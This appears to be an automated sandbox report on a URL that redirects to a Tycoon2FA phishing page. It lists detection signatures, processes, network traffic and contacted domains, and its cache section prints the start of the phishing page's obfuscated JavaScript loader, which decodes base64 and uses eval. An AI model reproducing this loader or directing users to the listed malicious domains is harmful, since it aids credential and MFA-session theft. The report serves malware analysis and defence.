Edit tour

Windows Analysis Report
http://nicholsoncop.com/

Overview

General Information

Sample URL:	http://nicholsoncop.com/
Analysis ID:	1647585
Infos:

Detection

Invisible JS, Tycoon2FA

Score:	84
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Yara detected AntiDebug via timestamp check

Yara detected Invisible JS

Yara detected Obfuscation Via HangulCharacter

Yara detected Tycoon 2FA PaaS

AI detected suspicious Javascript

Creates files inside the system directory

Deletes files inside the Windows folder

Classification

Process Tree

System is w10x64

chrome.exe (PID: 1308 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 4920 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2128,i,14344840874632310820,2799098671391695099,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 6904 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://nicholsoncop.com/" MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
0.1.d.script.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
0.0.d.script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
0.0.d.script.csv	JoeSecurity_AntiDebugBrowser	Yara detected AntiDebug via timestamp check	Joe Security
0.4..script.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
0.1.d.script.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
0.5.d.script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
0.1.pages.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
0.1.pages.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
0.0.pages.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
0.0.pages.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
Click to see the 5 entries

HTTP traffic detected: POST /report/v4?s=Oy0I1zZ7AGgSIslvjcjtBKXWR55D1T3Z8PSA1Ku7%2FyqlIvsNdXXekALkMS%2F8fLtU4jwn1%2FlZZxwnBSMXOXQjETMgbycsN%2BH0RyWBWcF8vOBHoNw8vnySEevWk3UQtp%2BOxulq HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 432Content-Type: application/reports+jsonOrigin: https://knig.rocaterma.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 23:59:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oy0I1zZ7AGgSIslvjcjtBKXWR55D1T3Z8PSA1Ku7%2FyqlIvsNdXXekALkMS%2F8fLtU4jwn1%2FlZZxwnBSMXOXQjETMgbycsN%2BH0RyWBWcF8vOBHoNw8vnySEevWk3UQtp%2BOxulq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=35119&min_rtt=35008&rtt_var=13207&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=2236&delivery_rate=81352&cwnd=252&unsent_bytes=0&cid=87cb41bd4521fd5f&ts=395&x=0"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 925a1fb69914c64a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=96202&min_rtt=96048&rtt_var=20385&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1898&delivery_rate=38769&cwnd=226&unsent_bytes=0&cid=cee02409b072dd4f&ts=831&x=0"

Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 142.251.41.4:443 -> 192.168.2.6:49695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.194.216:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.6:49711 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir1308_853168764

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir1308_853168764

Jump to behavior

Source: classification engine

Classification label: mal84.phis.evad.win@24/8@12/6

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2128,i,14344840874632310820,2799098671391695099,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://nicholsoncop.com/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2128,i,14344840874632310820,2799098671391695099,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Malware Analysis System Evasion

Yara detected AntiDebug via timestamp check

Source: Yara match

File source: 0.0.d.script.csv, type: HTML

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
http://nicholsoncop.com/	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label	Link
https://knig.rocaterma.ru/favicon.ico	100%	Avira URL Cloud	malware

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
a.nel.cloudflare.com	35.190.80.1	true	false	high
code.jquery.com	151.101.130.137	true	false	high
www.google.com	142.251.41.4	true	false	high
knig.rocaterma.ru	172.67.194.216	true	true	unknown
nicholsoncop.com	192.64.119.145	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://nicholsoncop.com/	false		unknown
https://a.nel.cloudflare.com/report/v4?s=Oy0I1zZ7AGgSIslvjcjtBKXWR55D1T3Z8PSA1Ku7%2FyqlIvsNdXXekALkMS%2F8fLtU4jwn1%2FlZZxwnBSMXOXQjETMgbycsN%2BH0RyWBWcF8vOBHoNw8vnySEevWk3UQtp%2BOxulq	false		high
https://code.jquery.com/jquery-3.6.0.min.js	false		high
https://knig.rocaterma.ru/favicon.ico	false	Avira URL Cloud: malware	unknown
https://knig.rocaterma.ru/krVkG/	true		unknown
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
151.101.130.137	code.jquery.com	United States	54113	FASTLYUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
192.64.119.145	nicholsoncop.com	United States	22612	NAMECHEAP-NETUS	false
142.251.41.4	www.google.com	United States	15169	GOOGLEUS	false
172.67.194.216	knig.rocaterma.ru	United States	13335	CLOUDFLARENETUS	true

Private

IP
192.168.2.6

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1647585
Start date and time:	2025-03-25 00:58:20 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	http://nicholsoncop.com/
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.phis.evad.win@24/8@12/6

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe, TextInputHost.exe
Excluded IPs from analysis (whitelisted): 142.251.41.3, 142.251.35.174, 142.250.72.110, 142.251.111.84, 142.251.40.110, 142.250.80.46, 199.232.214.172, 142.250.176.202, 142.251.41.10, 142.250.80.10, 172.217.165.138, 142.251.40.170, 142.250.65.170, 142.250.80.106, 142.250.72.106, 142.250.80.74, 142.251.40.234, 142.251.32.106, 142.250.65.234, 142.250.80.42, 142.250.65.202, 142.250.81.234, 142.251.40.202, 142.250.65.174, 142.251.32.110, 142.251.40.142, 142.250.81.238, 142.250.64.78, 142.251.40.238, 142.250.64.67, 142.250.80.78, 142.250.80.3, 184.31.69.3, 4.175.87.197
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, c.pki.goog
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: http://nicholsoncop.com/

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.5
Encrypted:	false
SSDEEP:	3:H+rYn:D
MD5:	F1C9C44E663E7E62582E3F5B236C1C72
SHA1:	E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
SHA-256:	D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
SHA-512:	19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
Malicious:	false
Reputation:	low
URL:	https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCXHBnhv-hXjkEgUNNzCpMCGKHZOJ1VAN2g==?alt=proto
Preview:	CgkKBw03MKkwGgA=

Chrome Cache Entry: 60

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (65364)
Category:	downloaded
Size (bytes):	777059
Entropy (8bit):	3.178604596577894
Encrypted:	false
SSDEEP:	384:giyHgc+AhtBMUiyHgc+AhtBMZLkK2A7TrLkK2A7T7:gihcHmUihcHmZLkK9TrLkK9T7
MD5:	62383B9A9870640565693DEFB6589AA9
SHA1:	642B6C6CEE1791337E9F556BC65DC4993ECC408C
SHA-256:	818952193C8E07A9EFC2E10C2727FB49F8F033EE3124BBC7962178CE8683E7F0
SHA-512:	EC7F47F939BDCB67F7FDB55D3FCA4AE281F7F0A6EAD78112D0A70623648060026E4F02A46BF16304FB5B833FCFE7DCE1CA70A918A8F609134CFD3D4F3C47D501
Malicious:	false
Reputation:	low
URL:	https://knig.rocaterma.ru/krVkG/
Preview:	<script>.YFKwHfZGUc = atob("aHR0cHM6Ly9rTmlHLnJvY2F0ZXJtYS5ydS9rclZrRy8=");.rcRAyxflCd = atob("bm9tYXRjaA==");.UOqCUgUYuB = atob("d3JpdGU=");.if(YFKwHfZGUc == rcRAyxflCd){.document[UOqCUgUYuB](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RWRnZSxjaHJvbWU9MSI+CiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4KICAgIDx0aXRsZT4mIzgyMDM7PC90aXRsZT4KICAgIDxzY3JpcHQ+CiAgICBjb25zdCBZekJieGtJT0ZBID0gewogIGdldChDeHhTc25kdU9WLCBxZFNreFBxSnJXKSB7CiAgICBjb25zdCBreEN3WnpOa1pPID0gWy4uLnFkU2t4UHFKclddCiAgICAgIC5tYXAobUN3Q0FaQ3NDSSA9PiArKCfvvqAnID4gbUN3Q0FaQ3NDSSkpCiAgICAgIC5qb2luKCcnKTsKICAgIGNvbnN0IEpWemNTdlZidGEgPSBreEN3WnpOa1pPLnJlcGxhY2UoLy57OH0vZywgaktmald3dEJsQyA9PgogICAgICBTdHJpbmcuZnJvbUNoYXJDb2RlKHBhcnNlSW50KGpLZmpXd3RCbEMsIDIpKQogICAgKTsKICAgIHJldHVybiBldmFsKEpWemNTdlZidGEpOwogIH0

Chrome Cache Entry: 61

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	downloaded
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:	1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	low
URL:	https://code.jquery.com/jquery-3.6.0.min.js
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 62

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3573)
Category:	downloaded
Size (bytes):	3578
Entropy (8bit):	5.830725508037086
Encrypted:	false
SSDEEP:	96:ecS5lUH6666ezDjA6wNDtzDJMTgxlEB7zOU8ffQffo:VsUH6666efjANMTgxuB7zOV
MD5:	2B599245570DBC39A9644FEF768F3536
SHA1:	91A7CD7909D5C43648AFB77092841F070C280292
SHA-256:	2A1FAEDB61C8C05A84AE56B3A5551938B53CB55E9A0605E9D5FD48E8F70E5B5B
SHA-512:	1641B9DF85024F7BD8B492F5097E2A50A6E851BE180AE56B8AB744AB2066ADD384F6E5DF9B95661080A33D86D9B29E6A21B31C9766EBB00515739971BBCC28A2
Malicious:	false
Reputation:	low
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
Preview:	)]}'.["",["fincen beneficial ownership","powerball winning lottery numbers","apple iphone 17","nba","solar eclipse","newjeans hiatus","northern lights aurora borealis forecast","tesla stocks"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CggvbS8wNWp2eBIGTGVhZ3VlMq8PZGF0YTppbWFnZS9qcGVnO2Jhc2U2NCwvOWovNEFBUVNrWkpSZ0FCQVFBQUFRQUJBQUQvMndDRUFBa0dCd2dIQmdrSUJ3Z0tDZ2tMRFJZUERRd01EUnNVRlJBV0lCMGlJaUFkSHg4a0tEUXNKQ1l4Sng4ZkxUMHRNVFUzT2pvNkl5cy9SRDg0UXpRNU9qY0JDZ29LRFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFFQUFRQU1CRVFBQ0VRRURFUUgveEFBY0FBRUFBZ01BQXdBQUFBQUFBQUFBQUFBQUJRWUJCQWNDQXdqL3hBQTBFQUFCQXdNREFRVUdCQWNBQUFBQUFBQUJBZ01FQUFVUkJoSWhRUk14WVlHUkJ6SjFvYlBDRkNJelFoVVdJMkp4a3FML3hBQWFBUUVBQXdFQkFRQUFBQUFBQUFBQUFBQUFCQVVHQWdNQi84UUFNQ

Total Packets: 244
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 25, 2025 00:59:21.028740883 CET	49678	443	192.168.2.6	20.42.65.91
Mar 25, 2025 00:59:21.339862108 CET	49678	443	192.168.2.6	20.42.65.91
Mar 25, 2025 00:59:21.792990923 CET	49672	443	192.168.2.6	204.79.197.203
Mar 25, 2025 00:59:21.949260950 CET	49678	443	192.168.2.6	20.42.65.91
Mar 25, 2025 00:59:23.152317047 CET	49678	443	192.168.2.6	20.42.65.91
Mar 25, 2025 00:59:25.558624983 CET	49678	443	192.168.2.6	20.42.65.91
Mar 25, 2025 00:59:30.511694908 CET	49678	443	192.168.2.6	20.42.65.91
Mar 25, 2025 00:59:31.480456114 CET	49672	443	192.168.2.6	204.79.197.203
Mar 25, 2025 00:59:36.175812960 CET	49695	443	192.168.2.6	142.251.41.4
Mar 25, 2025 00:59:36.175864935 CET	443	49695	142.251.41.4	192.168.2.6
Mar 25, 2025 00:59:36.175968885 CET	49695	443	192.168.2.6	142.251.41.4
Mar 25, 2025 00:59:36.176141024 CET	49695	443	192.168.2.6	142.251.41.4
Mar 25, 2025 00:59:36.176162004 CET	443	49695	142.251.41.4	192.168.2.6
Mar 25, 2025 00:59:36.368242025 CET	443	49695	142.251.41.4	192.168.2.6
Mar 25, 2025 00:59:36.368335009 CET	49695	443	192.168.2.6	142.251.41.4
Mar 25, 2025 00:59:36.369609118 CET	49695	443	192.168.2.6	142.251.41.4
Mar 25, 2025 00:59:36.369620085 CET	443	49695	142.251.41.4	192.168.2.6
Mar 25, 2025 00:59:36.369874001 CET	443	49695	142.251.41.4	192.168.2.6
Mar 25, 2025 00:59:36.418378115 CET	49695	443	192.168.2.6	142.251.41.4
Mar 25, 2025 00:59:37.336009026 CET	49696	80	192.168.2.6	192.64.119.145
Mar 25, 2025 00:59:37.336112976 CET	49697	80	192.168.2.6	192.64.119.145
Mar 25, 2025 00:59:37.374509096 CET	49698	443	192.168.2.6	192.64.119.145
Mar 25, 2025 00:59:37.374553919 CET	443	49698	192.64.119.145	192.168.2.6
Mar 25, 2025 00:59:37.374613047 CET	49698	443	192.168.2.6	192.64.119.145
Mar 25, 2025 00:59:37.374872923 CET	49698	443	192.168.2.6	192.64.119.145
Mar 25, 2025 00:59:37.374888897 CET	443	49698	192.64.119.145	192.168.2.6
Mar 25, 2025 00:59:37.443157911 CET	80	49696	192.64.119.145	192.168.2.6
Mar 25, 2025 00:59:37.443228960 CET	49696	80	192.168.2.6	192.64.119.145
Mar 25, 2025 00:59:37.446202040 CET	80	49697	192.64.119.145	192.168.2.6
Mar 25, 2025 00:59:37.446371078 CET	49697	80	192.168.2.6	192.64.119.145
Mar 25, 2025 00:59:40.126138926 CET	49678	443	192.168.2.6	20.42.65.91
Mar 25, 2025 00:59:40.235582113 CET	49696	80	192.168.2.6	192.64.119.145
Mar 25, 2025 00:59:40.342565060 CET	80	49696	192.64.119.145	192.168.2.6
Mar 25, 2025 00:59:40.342776060 CET	80	49696	192.64.119.145	192.168.2.6
Mar 25, 2025 00:59:40.390006065 CET	49696	80	192.168.2.6	192.64.119.145
Mar 25, 2025 00:59:40.701467991 CET	49700	443	192.168.2.6	172.67.194.216
Mar 25, 2025 00:59:40.701510906 CET	443	49700	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:40.701566935 CET	49700	443	192.168.2.6	172.67.194.216
Mar 25, 2025 00:59:40.701869011 CET	49700	443	192.168.2.6	172.67.194.216
Mar 25, 2025 00:59:40.701883078 CET	443	49700	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:40.918667078 CET	443	49700	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:40.918750048 CET	49700	443	192.168.2.6	172.67.194.216
Mar 25, 2025 00:59:40.919920921 CET	49700	443	192.168.2.6	172.67.194.216
Mar 25, 2025 00:59:40.919929981 CET	443	49700	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:40.920253992 CET	443	49700	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:40.920799971 CET	49700	443	192.168.2.6	172.67.194.216
Mar 25, 2025 00:59:40.968318939 CET	443	49700	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:41.104288101 CET	49702	80	192.168.2.6	142.251.40.163
Mar 25, 2025 00:59:41.193119049 CET	80	49702	142.251.40.163	192.168.2.6
Mar 25, 2025 00:59:41.193213940 CET	49702	80	192.168.2.6	142.251.40.163
Mar 25, 2025 00:59:41.193380117 CET	49702	80	192.168.2.6	142.251.40.163
Mar 25, 2025 00:59:41.282406092 CET	80	49702	142.251.40.163	192.168.2.6
Mar 25, 2025 00:59:41.284147024 CET	80	49702	142.251.40.163	192.168.2.6
Mar 25, 2025 00:59:41.290163040 CET	49702	80	192.168.2.6	142.251.40.163
Mar 25, 2025 00:59:41.379710913 CET	80	49702	142.251.40.163	192.168.2.6
Mar 25, 2025 00:59:41.420932055 CET	49702	80	192.168.2.6	142.251.40.163
Mar 25, 2025 00:59:41.606276035 CET	443	49700	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:41.606890917 CET	443	49700	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:41.606946945 CET	443	49700	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:41.606987000 CET	49700	443	192.168.2.6	172.67.194.216
Mar 25, 2025 00:59:41.607000113 CET	443	49700	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:41.607013941 CET	443	49700	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:41.607070923 CET	49700	443	192.168.2.6	172.67.194.216
Mar 25, 2025 00:59:41.607086897 CET	443	49700	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:41.607165098 CET	443	49700	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:41.607201099 CET	443	49700	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:41.607209921 CET	49700	443	192.168.2.6	172.67.194.216
Mar 25, 2025 00:59:41.607218027 CET	443	49700	172.67.194.216	192.168.2.6
Mar 25, 2025 00:59:41.607245922 CET	49700	443	192.168.2.6	172.67.194.216
Mar 25, 2025 00:59:41.608030081 CET	443	49700	172.67.194.216	192.168.2.6
